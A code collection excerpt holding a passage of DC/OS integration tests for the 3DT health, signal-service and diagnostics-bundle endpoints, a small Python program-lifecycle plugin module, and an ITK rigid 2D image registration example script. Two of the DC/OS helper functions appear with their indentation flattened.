        assert response['system'][sys_field], 'system metric {} cannot be empty'.format(sys_field)
def validate_node(nodes):
    """Assert that every element of *nodes* is a well-formed node record."""
    assert isinstance(nodes, list), 'input argument must be a list'
    assert len(nodes) > 0, 'input argument cannot be empty'
    expected_keys = ['host_ip', 'health', 'role']

    for entry in nodes:
        logging.info('check node reponse: {}'.format(entry))
        # exactly the expected keys, nothing more, nothing less
        assert len(entry) == len(expected_keys), 'node should have the following fields: {}'.format(
            ', '.join(expected_keys)
        )
        for key in expected_keys:
            assert key in entry, '{} must be in node'.format(key)

        # host_ip, health, role fields cannot be empty
        assert entry['health'] in [0, 1], 'health must be 0 or 1'
        assert entry['host_ip'], 'host_ip cannot be empty'
        assert entry['role'], 'role cannot be empty'
def test_3dt_nodes(cluster):
    """
    test a list of nodes with statuses endpoint /system/health/v1/nodes
    """
    # every master and every agent must appear in the listing
    expected_count = len(cluster.masters + cluster.all_slaves)
    for master in cluster.masters:
        response = make_3dt_request(master, BASE_ENDPOINT_3DT + '/nodes', cluster)
        assert len(response) == 1, 'nodes response must have only one field: nodes'
        assert 'nodes' in response
        assert isinstance(response['nodes'], list)
        assert len(response['nodes']) == expected_count, (
            'a number of nodes in response must be {}'.format(expected_count))

        # test nodes
        validate_node(response['nodes'])
def test_3dt_nodes_node(cluster):
    """
    test a specific node endpoint /system/health/v1/nodes/<node>
    """
    for master in cluster.masters:
        # get a list of nodes
        response = make_3dt_request(master, BASE_ENDPOINT_3DT + '/nodes', cluster)
        # idiomatic comprehension instead of list(map(lambda ...))
        nodes = [node['host_ip'] for node in response['nodes']]
        logging.info('received the following nodes: {}'.format(nodes))

        for node in nodes:
            node_response = make_3dt_request(master, BASE_ENDPOINT_3DT + '/nodes/{}'.format(node), cluster)
            validate_node([node_response])
def validate_units(units):
    """Assert that every element of *units* is a well-formed unit summary."""
    assert isinstance(units, list), 'input argument must be list'
    assert len(units) > 0, 'input argument cannot be empty'
    expected_keys = ['id', 'name', 'health', 'description']

    for entry in units:
        logging.info('validating unit {}'.format(entry))
        # exactly the expected keys, nothing more, nothing less
        assert len(entry) == len(expected_keys), 'a unit must have the following fields: {}'.format(
            ', '.join(expected_keys)
        )
        for key in expected_keys:
            assert key in entry, 'unit response must have field: {}'.format(key)

        # a unit must have all fields non-empty; health is restricted to 0/1
        assert entry['id'], 'id field cannot be empty'
        assert entry['name'], 'name field cannot be empty'
        assert entry['health'] in [0, 1], 'health must be 0 or 1'
        assert entry['description'], 'description field cannot be empty'
def validate_unit(unit):
    """Assert that *unit* is a fully-populated detailed unit record."""
    assert isinstance(unit, dict), 'input argument must be a dict'
    logging.info('validating unit: {}'.format(unit))
    expected_keys = ['id', 'health', 'output', 'description', 'help', 'name']

    # exactly the expected keys, nothing more, nothing less
    assert len(unit) == len(expected_keys), 'unit must have the following fields: {}'.format(
        ', '.join(expected_keys)
    )
    for key in expected_keys:
        assert key in unit, '{} must be in a unit'.format(key)

    # every field except 'output' must be non-empty; health is 0 or 1
    assert unit['id'], 'id field cannot be empty'
    assert unit['name'], 'name field cannot be empty'
    assert unit['health'] in [0, 1], 'health must be 0 or 1'
    assert unit['description'], 'description field cannot be empty'
    assert unit['help'], 'help field cannot be empty'
def test_3dt_nodes_node_units(cluster):
    """
    test a list of units from a specific node, endpoint /system/health/v1/nodes/<node>/units
    """
    for master in cluster.masters:
        # get a list of nodes
        response = make_3dt_request(master, BASE_ENDPOINT_3DT + '/nodes', cluster)
        # idiomatic comprehension instead of list(map(lambda ...))
        nodes = [node['host_ip'] for node in response['nodes']]
        logging.info('received the following nodes: {}'.format(nodes))

        for node in nodes:
            node_response = make_3dt_request(master, BASE_ENDPOINT_3DT + '/nodes/{}'.format(node), cluster)
            logging.info('node reponse: {}'.format(node_response))
            units_response = make_3dt_request(master, BASE_ENDPOINT_3DT + '/nodes/{}/units'.format(node), cluster)
            logging.info('units reponse: {}'.format(units_response))

            assert len(units_response) == 1, 'unit response should have only 1 field `units`'
            assert 'units' in units_response
            validate_units(units_response['units'])
def test_3dt_nodes_node_units_unit(cluster):
    """
    test a specific unit for a specific node, endpoint /system/health/v1/nodes/<node>/units/<unit>
    """
    for master in cluster.masters:
        response = make_3dt_request(master, BASE_ENDPOINT_3DT + '/nodes', cluster)
        # idiomatic comprehensions instead of list(map(lambda ...))
        nodes = [node['host_ip'] for node in response['nodes']]
        for node in nodes:
            units_response = make_3dt_request(master, BASE_ENDPOINT_3DT + '/nodes/{}/units'.format(node), cluster)
            unit_ids = [unit['id'] for unit in units_response['units']]
            logging.info('unit ids: {}'.format(unit_ids))

            for unit_id in unit_ids:
                validate_unit(
                    make_3dt_request(master, BASE_ENDPOINT_3DT + '/nodes/{}/units/{}'.format(node, unit_id), cluster))
def test_3dt_units(cluster):
    """
    test a list of collected units, endpoint /system/health/v1/units
    """
    # get all unique unit names across every master and agent
    all_units = set()
    for node in cluster.masters:
        node_response = make_3dt_request(node, BASE_ENDPOINT_3DT, cluster, port=PORT_3DT)
        for unit in node_response['units']:
            all_units.add(unit['id'])

    for node in cluster.all_slaves:
        node_response = make_3dt_request(node, BASE_ENDPOINT_3DT, cluster, port=PORT_3DT_AGENT)
        for unit in node_response['units']:
            all_units.add(unit['id'])
    logging.info('Master units: {}'.format(all_units))

    # test against masters (fixed comment typo "agaist")
    for master in cluster.masters:
        units_response = make_3dt_request(master, BASE_ENDPOINT_3DT + '/units', cluster)
        validate_units(units_response['units'])

        # idiomatic comprehension instead of list(map(lambda ...))
        pulled_units = [unit['id'] for unit in units_response['units']]
        logging.info('collected units: {}'.format(pulled_units))
        assert set(pulled_units) == all_units, 'not all units have been collected by 3dt puller, missing: {}'.format(
            set(pulled_units).symmetric_difference(all_units)
        )
def test_3dt_units_unit(cluster):
    """
    test a unit response in a right format, endpoint: /system/health/v1/units/<unit>
    """
    for master in cluster.masters:
        units_response = make_3dt_request(master, BASE_ENDPOINT_3DT + '/units', cluster)
        # idiomatic comprehension instead of list(map(lambda ...))
        pulled_units = [unit['id'] for unit in units_response['units']]
        for unit in pulled_units:
            unit_response = make_3dt_request(master, BASE_ENDPOINT_3DT + '/units/{}'.format(unit), cluster)
            validate_units([unit_response])
def make_nodes_ip_map(cluster):
    """
    a helper function to make a map detected_ip -> external_ip
    """
    ip_map = {}
    # masters answer 3DT directly, agents via agent-adminrouter
    for master in cluster.masters:
        internal_ip = make_3dt_request(master, BASE_ENDPOINT_3DT, cluster, port=PORT_3DT)['ip']
        ip_map[internal_ip] = master
    for agent in cluster.slaves:
        internal_ip = make_3dt_request(agent, BASE_ENDPOINT_3DT, cluster, port=PORT_3DT_AGENT)['ip']
        ip_map[internal_ip] = agent

    logging.info('detected ips: {}'.format(ip_map))
    return ip_map
def test_3dt_units_unit_nodes(cluster):
    """
    test a list of nodes for a specific unit, endpoint /system/health/v1/units/<unit>/nodes
    """
    nodes_ip_map = make_nodes_ip_map(cluster)

    for master in cluster.masters:
        units_response = make_3dt_request(master, BASE_ENDPOINT_3DT + '/units', cluster)
        # idiomatic comprehensions instead of list(map(lambda ...))
        pulled_units = [unit['id'] for unit in units_response['units']]
        for unit in pulled_units:
            nodes_response = make_3dt_request(master, BASE_ENDPOINT_3DT + '/units/{}/nodes'.format(unit), cluster)
            validate_node(nodes_response['nodes'])

        # make sure dcos-mesos-master.service has master nodes and dcos-mesos-slave.service has agent nodes
        master_nodes_response = make_3dt_request(
            master, BASE_ENDPOINT_3DT + '/units/dcos-mesos-master.service/nodes', cluster)
        master_nodes = [nodes_ip_map.get(node['host_ip']) for node in master_nodes_response['nodes']]
        logging.info('master_nodes: {}'.format(master_nodes))
        assert len(master_nodes) == len(cluster.masters), '{} != {}'.format(master_nodes, cluster.masters)
        assert set(master_nodes) == set(cluster.masters), 'a list of difference: {}'.format(
            set(master_nodes).symmetric_difference(set(cluster.masters))
        )

        agent_nodes_response = make_3dt_request(
            master, BASE_ENDPOINT_3DT + '/units/dcos-mesos-slave.service/nodes', cluster)
        agent_nodes = [nodes_ip_map.get(node['host_ip']) for node in agent_nodes_response['nodes']]
        # fixed log label typo (was 'aget_nodes')
        logging.info('agent_nodes: {}'.format(agent_nodes))
        assert len(agent_nodes) == len(cluster.slaves), '{} != {}'.format(agent_nodes, cluster.slaves)
def test_3dt_units_unit_nodes_node(cluster):
    """
    test a specific node for a specific unit, endpoint /system/health/v1/units/<unit>/nodes/<node>
    """
    required_node_fields = ['host_ip', 'health', 'role', 'output', 'help']

    for master in cluster.masters:
        units_response = make_3dt_request(master, BASE_ENDPOINT_3DT + '/units', cluster)
        # idiomatic comprehensions instead of list(map(lambda ...))
        pulled_units = [unit['id'] for unit in units_response['units']]
        logging.info('pulled units: {}'.format(pulled_units))
        for unit in pulled_units:
            nodes_response = make_3dt_request(master, BASE_ENDPOINT_3DT + '/units/{}/nodes'.format(unit), cluster)
            pulled_nodes = [node['host_ip'] for node in nodes_response['nodes']]
            logging.info('pulled nodes: {}'.format(pulled_nodes))
            for node in pulled_nodes:
                node_response = make_3dt_request(
                    master, BASE_ENDPOINT_3DT + '/units/{}/nodes/{}'.format(unit, node), cluster)
                logging.info('node response: {}'.format(node_response))
                # BUG FIX: the failure message used ', '.format(required_node_fields),
                # which always rendered as just ", "; ', '.join(...) was intended.
                assert len(node_response) == len(required_node_fields), 'required fields: {}'.format(
                    ', '.join(required_node_fields)
                )
                for required_node_field in required_node_fields:
                    assert required_node_field in node_response, 'field {} must be set'.format(required_node_field)

                # host_ip, health, role, help cannot be empty
                assert node_response['host_ip'], 'host_ip field cannot be empty'
                assert node_response['health'] in [0, 1], 'health must be 0 or 1'
                assert node_response['role'], 'role field cannot be empty'
                assert node_response['help'], 'help field cannot be empty'
def test_3dt_report(cluster):
    """
    test 3dt report endpoint /system/health/v1/report
    """
    for master in cluster.masters:
        report = make_3dt_request(master, BASE_ENDPOINT_3DT + '/report', cluster)
        # both report sections must be present and non-empty
        for section in ('Units', 'Nodes'):
            assert section in report
            assert len(report[section]) > 0
@pytest.mark.skipif(os.getenv('TEST_ENV') == 'vagrant', reason="Sometimes vagrant sucks, sometimes.")
def test_signal_service(registry_cluster):
    """
    signal-service runs on an hourly timer, this test runs it as a one-off
    and pushes the results to the test_server app for easy retrieval
    """
    cluster = registry_cluster
    test_server_app_definition, _ = cluster.get_base_testapp_definition()
    service_points = cluster.deploy_marathon_app(test_server_app_definition)

    @retrying.retry(wait_fixed=1000, stop_max_delay=120*1000)
    def wait_for_endpoint():
        """Make sure test server is available before posting to it"""
        r = requests.get('http://{}:{}/signal_test_cache'.format(
            service_points[0].host,
            service_points[0].port))
        assert r.status_code == 200

    wait_for_endpoint()

    test_host = service_points[0].host
    test_port = service_points[0].port
    test_cache_url = "http://{}:{}/signal_test_cache".format(test_host, test_port)

    # One-off dcos-signal run that POSTs its payload to the test server's
    # cache endpoint (-test-url) instead of the real telemetry sink, then
    # sleeps so the task stays alive for the health check.
    cmd = """
    ID_PATH="/${PWD}/test-cluster-id"
    echo 'test-id' > $ID_PATH
    /opt/mesosphere/bin/dcos-signal \
    -cluster-id-path $ID_PATH \
    -test-url %s
    sleep 3600
    """ % test_cache_url
    print("CMD: {}".format(cmd))

    test_uuid = uuid.uuid4().hex
    signal_app_definition = {
        'id': "/integration-test-signal-service-oneshot-%s" % test_uuid,
        'cmd': cmd,
        'cpus': 0.1,
        'mem': 64,
        'instances': 1,
        # Health passes once the signal payload has landed in the cache
        # (curl output is non-empty).
        'healthChecks': [{
            'protocol': 'COMMAND',
            'command': {
                'value': 'curl {} > tmp; test -s tmp'.format(test_cache_url)
            },
            'gracePeriodSeconds': 0,
            'intervalSeconds': 10,
            'timeoutSeconds': 10,
            'maxConsecutiveFailures': 1,
            'ignoreHttp1xx': False}]
    }
    cluster.deploy_marathon_app(signal_app_definition, ignore_failed_tasks=True)

    r = requests.get(test_cache_url)
    # Handy for diagnosing strange signal service test behavior, not sure if we should
    # leave these in for master branch, or remove for the final PR.
    print('TESTING SIGNAL RETURN:\n{}'.format(r.text))
    print('CACHE SERVER STATUS:\n{}'.format(r.status_code))

    # The cache stores the signal payload as a JSON-encoded string, hence the
    # double decode: r.json() yields a string, json.loads() yields the dict.
    r_data = json.loads(r.json())

    cluster.destroy_marathon_app(signal_app_definition['id'])
    cluster.destroy_marathon_app(test_server_app_definition['id'])

    # Expected payload skeleton: one track per signal category.
    exp_data = {
        'diagnostics': {
            'event': 'health',
            'anonymousId': 'test-id',
            'properties': {}
        },
        'cosmos': {
            'event': 'package_list',
            'anonymousId': 'test-id',
            'properties': {}
        },
        'mesos': {
            'event': 'mesos_track',
            'anonymousId': 'test-id',
            'properties': {}
        }
    }

    # Generic properties which are the same between all tracks
    generic_properties = {
        'provider': cluster.provider,
        'source': 'cluster',
        'clusterId': 'test-id',
        'customerKey': '',
        'environmentVersion': '',
        'variant': 'open'
    }

    # Insert the generic property data which is the same between all signal tracks
    exp_data['diagnostics']['properties'].update(generic_properties)
    exp_data['cosmos']['properties'].update(generic_properties)
    exp_data['mesos']['properties'].update(generic_properties)

    # Insert all the diagnostics data programmatically
    master_units = [
        'adminrouter-service',
        'cosmos-service',
        'exhibitor-service',
        'history-service',
        'logrotate-master-service',
        'logrotate-master-timer',
        'marathon-service',
        'mesos-dns-service',
        'mesos-master-service',
        'metronome-service',
        'signal-service']
    all_node_units = [
        'adminrouter-reload-service',
        'adminrouter-reload-timer',
        '3dt-service',
        'epmd-service',
        'gen-resolvconf-service',
        'gen-resolvconf-timer',
        'minuteman-service',
        'navstar-service',
        'signal-timer',
        'spartan-service',
        'spartan-watchdog-service',
        'spartan-watchdog-timer']
    slave_units = [
        'mesos-slave-service',
        'vol-discovery-priv-agent-service']
    public_slave_units = [
        'mesos-slave-public-service',
        'vol-discovery-pub-agent-service']
    all_slave_units = [
        '3dt-socket',
        'adminrouter-agent-service',
        'logrotate-agent-service',
        'logrotate-agent-timer',
        'rexray-service']
    master_units.append('oauth-service')

    # Expect every unit healthy on every node of its class (total = node
    # count, unhealthy = 0).
    for unit in master_units:
        exp_data['diagnostics']['properties']["health-unit-dcos-{}-total".format(unit)] = len(cluster.masters)
        exp_data['diagnostics']['properties']["health-unit-dcos-{}-unhealthy".format(unit)] = 0
    for unit in all_node_units:
        exp_data['diagnostics']['properties']["health-unit-dcos-{}-total".format(unit)] = len(
            cluster.all_slaves+cluster.masters)
        exp_data['diagnostics']['properties']["health-unit-dcos-{}-unhealthy".format(unit)] = 0
    for unit in slave_units:
        exp_data['diagnostics']['properties']["health-unit-dcos-{}-total".format(unit)] = len(cluster.slaves)
        exp_data['diagnostics']['properties']["health-unit-dcos-{}-unhealthy".format(unit)] = 0
    for unit in public_slave_units:
        exp_data['diagnostics']['properties']["health-unit-dcos-{}-total".format(unit)] = len(cluster.public_slaves)
        exp_data['diagnostics']['properties']["health-unit-dcos-{}-unhealthy".format(unit)] = 0
    for unit in all_slave_units:
        exp_data['diagnostics']['properties']["health-unit-dcos-{}-total".format(unit)] = len(cluster.all_slaves)
        exp_data['diagnostics']['properties']["health-unit-dcos-{}-unhealthy".format(unit)] = 0

    # Check the entire hash of diagnostics data
    assert r_data['diagnostics'] == exp_data['diagnostics']

    # Check a subset of things regarding Mesos that we can logically check for
    framework_names = [x['name'] for x in r_data['mesos']['properties']['frameworks']]
    assert 'marathon' in framework_names
    assert 'metronome' in framework_names

    # There are no packages installed by default on the integration test, ensure the key exists
    assert len(r_data['cosmos']['properties']['package_list']) == 0
def test_mesos_agent_role_assignment(cluster):
    """Verify each Mesos agent registered with the expected default role.

    Public agents must expose the ``slave_public`` role; private agents keep
    the wildcard ``*`` role.
    """
    def default_role(agent_ip):
        # Query the agent's state endpoint directly on the Mesos agent port.
        state = requests.get('http://{}:5051/state.json'.format(agent_ip)).json()
        return state['flags']['default_role']

    for agent in cluster.public_slaves:
        assert default_role(agent) == 'slave_public'
    for agent in cluster.slaves:
        assert default_role(agent) == '*'
def _get_bundle_list(cluster):
list_url = '/system/health/v1/report/diagnostics/list/all'
response = cluster.get(path=list_url).json()
logging.info('GET {}, response: {}'.format(list_url, response))
bundles = []
for _, bundle_list in response.items():
if bundle_list is not None and isinstance(bundle_list, list) and len(bundle_list) > 0:
# append bundles and get just the filename.
bundles += map(lambda s: os.path.basename(s['file_name']), bundle_list)
return bundles
def test_3dt_bundle_create(cluster):
    """
    test bundle create functionality
    """
    # start the diagnostics bundle job
    create_url = '/system/health/v1/report/diagnostics/create'
    response = cluster.post(path=create_url, payload={"nodes": ["all"]}).json()
    logging.info('POST {}, response: {}'.format(create_url, response))
    # make sure the job is done, timeout is 5 sec, wait between retying is 1 sec
    status_url = '/system/health/v1/report/diagnostics/status/all'

    @retrying.retry(stop_max_delay=8000, wait_fixed=1000)
    def wait_for_job():
        # NOTE: `response` here is a *local* of the closure; it does not
        # overwrite the POST response above, which is still read after this
        # helper returns to get the created bundle's name.
        response = cluster.get(path=status_url).json()
        logging.info('GET {}, response: {}'.format(status_url, response))
        # check `is_running` attribute for each host. All of them must be False
        for _, attributes in response.items():
            assert not attributes['is_running']
        # sometimes it may take extra seconds to list bundles after the job is finished.
        # the job should finish within 5 seconds and listing should be available after 3 seconds.
        assert _get_bundle_list(cluster), 'get a list of bundles timeout'

    wait_for_job()
    # the job should be complete at this point.
    # check the listing for a zip file
    bundles = _get_bundle_list(cluster)
    assert len(bundles) == 1, 'bundle file not found'
    assert bundles[0] == response['extra']['bundle_name']
def verify_unit_response(zip_ext_file):
    """Check a gzipped systemd unit log for the journalctl permission hint.

    Fails the test when journald reported that 3dt could only read its own
    messages, i.e. it lacked permission to run ``journalctl`` system-wide.
    """
    assert isinstance(zip_ext_file, zipfile.ZipExtFile)
    unit_output = str(gzip.decompress(zip_ext_file.read()))
    # TODO: This seems like a really fragile string to be searching for. This might need to be changed for
    # different localizations.
    permission_hint = 'Hint: You are currently not seeing messages from other users and the system'
    assert permission_hint not in unit_output, (
        '3dt does not have permission to run `journalctl`')
def test_3dt_bundle_download_and_extract(cluster):
    """
    test bundle download and validate zip file

    For every bundle the cluster serves: download it to a temp dir, confirm it
    is a valid zip, and check that each node's folder contains the expected
    log files plus a 3dt health report whose 'ip' matches the node.
    """
    bundles = _get_bundle_list(cluster)
    assert bundles
    expected_common_files = ['dmesg-0.output.gz', 'opt/mesosphere/active.buildinfo.full.json.gz', '3dt-health.json']
    # these files are expected to be in archive for a master host
    expected_master_files = ['dcos-mesos-master.service.gz'] + expected_common_files
    # for agent host
    expected_agent_files = ['dcos-mesos-slave.service.gz'] + expected_common_files
    # for public agent host
    expected_public_agent_files = ['dcos-mesos-slave-public.service.gz'] + expected_common_files
    with tempfile.TemporaryDirectory() as tmp_dir:
        download_base_url = '/system/health/v1/report/diagnostics/serve'
        for bundle in bundles:
            bundle_full_location = os.path.join(tmp_dir, bundle)
            # Stream the bundle to disk in 1 KiB chunks.
            with open(bundle_full_location, 'wb') as f:
                r = cluster.get(path=os.path.join(download_base_url, bundle), stream=True)
                for chunk in r.iter_content(1024):
                    f.write(chunk)
            # validate bundle zip file.
            assert zipfile.is_zipfile(bundle_full_location)
            z = zipfile.ZipFile(bundle_full_location)
            # get a list of all files in a zip archive.
            archived_items = z.namelist()
            # make sure all required log files for master node are in place.
            for master_ip in cluster.masters:
                master_folder = master_ip + '_master/'
                # try to load 3dt health report and validate the report is for this host
                health_report = json.loads(z.read(master_folder + '3dt-health.json').decode())
                assert 'ip' in health_report
                assert health_report['ip'] == master_ip
                # make sure systemd unit output is correct and does not contain error message
                gzipped_unit_output = z.open(master_folder + 'dcos-mesos-master.service.gz')
                verify_unit_response(gzipped_unit_output)
                for expected_master_file in expected_master_files:
                    expected_file = master_folder + expected_master_file
                    assert expected_file in archived_items, 'expecting {} in {}'.format(expected_file, archived_items)
            # make sure all required log files for agent node are in place.
            for slave_ip in cluster.slaves:
                agent_folder = slave_ip + '_agent/'
                # try to load 3dt health report and validate the report is for this host
                health_report = json.loads(z.read(agent_folder + '3dt-health.json').decode())
                assert 'ip' in health_report
                assert health_report['ip'] == slave_ip
                # make sure systemd unit output is correct and does not contain error message
                gzipped_unit_output = z.open(agent_folder + 'dcos-mesos-slave.service.gz')
                verify_unit_response(gzipped_unit_output)
                for expected_agent_file in expected_agent_files:
                    expected_file = agent_folder + expected_agent_file
                    assert expected_file in archived_items, 'expecting {} in {}'.format(expected_file, archived_items)
            # make sure all required log files for public agent node are in place.
            for public_slave_ip in cluster.public_slaves:
                agent_public_folder = public_slave_ip + '_agent_public/'
                # try to load 3dt health report and validate the report is for this host
                health_report = json.loads(z.read(agent_public_folder + '3dt-health.json').decode())
                assert 'ip' in health_report
                assert health_report['ip'] == public_slave_ip
                # make sure systemd unit output is correct and does not contain error message
                gzipped_unit_output = z.open(agent_public_folder + 'dcos-mesos-slave-public.service.gz')
                verify_unit_response(gzipped_unit_output)
                for expected_public_agent_file in expected_public_agent_files:
                    expected_file = agent_public_folder + expected_public_agent_file
                    assert expected_file in archived_items, ('expecting {} in {}'.format(expected_file, archived_items))
def test_bundle_delete(cluster):
    """Delete every diagnostics bundle and verify the listing becomes empty."""
    bundles = _get_bundle_list(cluster)
    assert bundles, 'no bundles found'
    delete_base_url = '/system/health/v1/report/diagnostics/delete'
    for bundle in bundles:
        cluster.post(os.path.join(delete_base_url, bundle))
    remaining = _get_bundle_list(cluster)
    assert len(remaining) == 0, 'Could not remove bundles {}'.format(remaining)
def test_diagnostics_bundle_status(cluster):
# validate diagnostics job status response
diagnostics_bundle_status = cluster.get(path='/system/health/v1/report/diagnostics/status/all').json()
required_status_fields = ['is_running', 'status', 'errors', 'last_bundle_dir', 'job_started', 'job_ended',
'job_duration', 'diagnostics_bundle_dir', 'diagnostics_job_timeout_min',
'journald_logs_since_hours', 'diagnostics_job_get_since_url_timeout_min',
'command_exec_timeout_sec', 'diagnostics_partition_disk_usage_percent']
for _, properties in diagnostics_bundle_status.items():
assert len(properties) == len(required_status_fields), 'response must have the following fields: {}'.format(
required_status_fields
)
for required_status_field in required_status_fields:
assert required_status_field in properties, 'property {} not found'.format(required_status_field)
| movicha/dcos | packages/dcos-integration-test/extra/integration_test.py | Python | apache-2.0 | 79,003 |
import shlex
import time
class Plugin(object):
    """Base class for program lifecycle plugins.

    Subclasses implement ``on_program_*`` hooks (init/start/started/stopped);
    the base class itself holds no state.
    """
    def __init__(self):
        pass
class Debug(Plugin):
    """Plugin that optionally wraps a program's command in a gdb batch run.

    When ``debug=True`` is passed at program init, the command is prefixed so
    that gdb runs it, prints a backtrace on exit, and quits.
    """

    def __init__(self):
        super(Debug, self).__init__()
        self._prefix = shlex.split('gdb --batch --quiet -ex run -ex "bt" -ex quit --args')

    def on_program_init(self, program, **kwargs):
        """Record the debug flag and, when enabled, prepend the gdb wrapper."""
        debug_enabled = kwargs.get("debug", False)
        program._debug = debug_enabled
        if debug_enabled:
            program.command = self._prefix + program.command

    def on_program_start(self, program, **kwargs):
        """Announce that the program is running under the debugger."""
        if program._debug:
            program.announce("Entering debug mode: %s" % program.command)
class Wait(Plugin):
    """Plugin that sleeps for a configurable delay after start/stop events."""

    def __init__(self):
        super(Wait, self).__init__()

    def on_program_init(self, program, **kwargs):
        """Stash the requested delay (seconds; 0 disables it) on the program."""
        program._wait = kwargs.get("wait", 0)

    def _pause(self, program):
        # A missing attribute means on_program_init never ran; treat as no delay.
        delay = getattr(program, "_wait", 0)
        if delay > 0:
            time.sleep(delay)

    def on_program_started(self, program, **kwargs):
        self._pause(program)

    def on_program_stopped(self, program, **kwargs):
        self._pause(program)
class ExportEnvironment(Plugin):
    """Plugin that announces a program's working directory and environment."""

    def __init__(self):
        super(ExportEnvironment, self).__init__()

    def on_program_start(self, program, **kwargs):
        """Announce the directory (when set) and the exported environment.

        The environment is rendered as space-separated ``"KEY=VALUE"`` pairs.
        """
        env = " ".join(["\"{}={}\"".format(k, v) for k, v in program.environment.items()])
        # Idiom fix: `is not None` instead of `not ... is None`.
        if program.directory is not None:
            program.announce("Directory: " + program.directory)
        program.announce("Environment: " + env)
| lukacu/ignition | ignition/plugin.py | Python | mit | 1,491 |
#==========================================================================
#
# Copyright Insight Software Consortium
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0.txt
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#==========================================================================*/
# Rigid 2D registration example: aligns a moving image onto a fixed image with
# a CenteredRigid2DTransform, a mean-squares metric and regular-step gradient
# descent, then resamples the moving image and writes the registered result.
# NOTE: Python 2 syntax (print statements), matching the wrapped ITK bindings.
from InsightToolkit import *
from sys import argv
#
# Read the fixed and moving images using filenames
# from the command line arguments
#
fixedImageReader = itkImageFileReaderF2_New()
movingImageReader = itkImageFileReaderF2_New()
fixedImageReader.SetFileName( argv[1] )
movingImageReader.SetFileName( argv[2] )
fixedImageReader.Update()
movingImageReader.Update()
fixedImage = fixedImageReader.GetOutput()
movingImage = movingImageReader.GetOutput()
#
# Instantiate the classes for the registration framework
#
registration = itkImageRegistrationMethodF2F2_New()
imageMetric = itkMeanSquaresImageToImageMetricF2F2_New()
transform = itkCenteredRigid2DTransform_New()
optimizer = itkRegularStepGradientDescentOptimizer_New()
interpolator = itkLinearInterpolateImageFunctionF2D_New()
# Wire the components together; the wrapped API requires raw pointers.
registration.SetOptimizer( optimizer.GetPointer() )
registration.SetTransform( transform.GetPointer() )
registration.SetInterpolator( interpolator.GetPointer() )
registration.SetMetric( imageMetric.GetPointer() )
registration.SetFixedImage( fixedImage )
registration.SetMovingImage( movingImage )
registration.SetFixedImageRegion( fixedImage.GetBufferedRegion() )
#
# Initial transform parameters
#
transform.SetAngle( 0.0 );
# center of the fixed image (in physical coordinates: origin + spacing * size / 2)
fixedSpacing = fixedImage.GetSpacing()
fixedOrigin = fixedImage.GetOrigin()
fixedSize = fixedImage.GetLargestPossibleRegion().GetSize()
centerFixed = ( fixedOrigin.GetElement(0) + fixedSpacing.GetElement(0) * fixedSize.GetElement(0) / 2.0,
                fixedOrigin.GetElement(1) + fixedSpacing.GetElement(1) * fixedSize.GetElement(1) / 2.0 )
# center of the moving image
movingSpacing = movingImage.GetSpacing()
movingOrigin = movingImage.GetOrigin()
movingSize = movingImage.GetLargestPossibleRegion().GetSize()
centerMoving = ( movingOrigin.GetElement(0) + movingSpacing.GetElement(0) * movingSize.GetElement(0) / 2.0,
                 movingOrigin.GetElement(1) + movingSpacing.GetElement(1) * movingSize.GetElement(1) / 2.0 )
# transform center: rotate about the fixed image's center
center = transform.GetCenter()
center.SetElement( 0, centerFixed[0] )
center.SetElement( 1, centerFixed[1] )
# transform translation: initial guess maps fixed center onto moving center
translation = transform.GetTranslation()
translation.SetElement( 0, centerMoving[0] - centerFixed[0] )
translation.SetElement( 1, centerMoving[1] - centerFixed[1] )
initialParameters = transform.GetParameters()
print "Initial Parameters: "
print "Angle: %f" % (initialParameters.GetElement(0), )
print "Center: %f, %f" % ( initialParameters.GetElement(1), initialParameters.GetElement(2) )
print "Translation: %f, %f" % (initialParameters.GetElement(3), initialParameters.GetElement(4))
registration.SetInitialTransformParameters( initialParameters )
#
# Define optimizer parameters
#
# optimizer scale: translations are scaled down so a unit optimizer step moves
# the angle (radians) and the spatial parameters by comparable amounts
translationScale = 1.0 / 1000.0
optimizerScales = itkArrayD( transform.GetNumberOfParameters() )
optimizerScales.SetElement(0, 1.0)
optimizerScales.SetElement(1, translationScale)
optimizerScales.SetElement(2, translationScale)
optimizerScales.SetElement(3, translationScale)
optimizerScales.SetElement(4, translationScale)
optimizer.SetScales( optimizerScales )
optimizer.SetMaximumStepLength( 0.1 )
optimizer.SetMinimumStepLength( 0.001 )
optimizer.SetNumberOfIterations( 200 )
#
# Iteration Observer
#
def iterationUpdate():
    # Print the current metric value and transform parameters each iteration.
    currentParameter = transform.GetParameters()
    print "M: %f P: %f %f %f %f %f " % ( optimizer.GetValue(),
                                         currentParameter.GetElement(0),
                                         currentParameter.GetElement(1),
                                         currentParameter.GetElement(2),
                                         currentParameter.GetElement(3),
                                         currentParameter.GetElement(4) )
iterationCommand = itkPyCommand_New()
iterationCommand.SetCommandCallable( iterationUpdate )
optimizer.AddObserver( itkIterationEvent(), iterationCommand.GetPointer() )
print "Starting registration"
#
# Start the registration process
#
registration.StartRegistration()
#
# Get the final parameters of the transformation
#
finalParameters = registration.GetLastTransformParameters()
print "Final Registration Parameters "
print "Angle in radians = %f" % finalParameters.GetElement(0)
print "Rotation Center X = %f" % finalParameters.GetElement(1)
print "Rotation Center Y = %f" % finalParameters.GetElement(2)
print "Translation in X = %f" % finalParameters.GetElement(3)
print "Translation in Y = %f" % finalParameters.GetElement(4)
# Now, we use the final transform for resampling the moving image.
resampler = itkResampleImageFilterF2F2_New()
resampler.SetTransform( transform.GetPointer() )
resampler.SetInput( movingImage )
region = fixedImage.GetLargestPossibleRegion()
# Output geometry mirrors the fixed image so the images can be compared.
resampler.SetSize( region.GetSize() )
resampler.SetOutputSpacing( fixedImage.GetSpacing() )
resampler.SetOutputDirection( fixedImage.GetDirection() )
resampler.SetOutputOrigin( fixedImage.GetOrigin() )
resampler.SetDefaultPixelValue( 100 )
#
# Cast for output
#
outputCast = itkRescaleIntensityImageFilterF2US2_New()
outputCast.SetInput( resampler.GetOutput() )
outputCast.SetOutputMinimum( 0 )
outputCast.SetOutputMaximum( 65535 )
writer = itkImageFileWriterUS2_New()
writer.SetFileName( argv[3] )
writer.SetInput( outputCast.GetOutput() )
writer.Update()
